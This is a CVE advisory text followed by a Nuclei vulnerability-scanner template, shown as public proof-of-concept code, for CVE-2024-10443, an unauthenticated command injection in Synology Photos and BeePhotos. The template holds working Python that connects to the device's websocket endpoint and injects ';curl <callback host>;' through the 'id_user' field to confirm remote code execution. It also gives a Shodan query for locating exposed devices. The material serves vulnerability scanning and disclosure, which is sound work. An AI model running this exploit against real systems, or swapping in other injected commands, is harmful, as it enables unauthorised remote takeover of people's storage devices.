Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
PoC代码[已公开]
id: CVE-2024-10443
info:
name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
author: iamnoooob,pdresearch
severity: critical
description: |
Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
reference:
- https://www.synology.com/en-us/security/advisory/Synology_SA_24_18
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10443
cwe-id: CWE-77
epss-score: 0.69894
epss-percentile: 0.98624
cpe: cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*
metadata:
verified: true
max-request: 1
vendor: synology
product: photos
framework: diskstation_manager
shodan-query: html:"BeeStation"
tags: unauth,synology,rce,websocket,diskstation
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
import websocket,os,json # pip install websocket-client
url = "ws://"+os.getenv('Hostname')+"/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
ws = websocket.create_connection(url)
initial = ws.recv()
ws.send("40")
response = ws.recv()
payload = {
"id_user": ";curl "+os.getenv('OAST')+";",
"timestamp": 0,
"location": "xxd"
}
event_message = f'42["page-view",{json.dumps(payload)}]'
ws.send(event_message)
ws.close()
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
# digest: 4a0a0047304502200c520e0378568db2d7924f230807017beef1733f4f9d720642a47ceaf367ced00221009a3738866903e35ff9f1db4665839ee7e83b7bee716a06c186eeb0c499569b3f:922c64590222798bb761d5b6d8e72950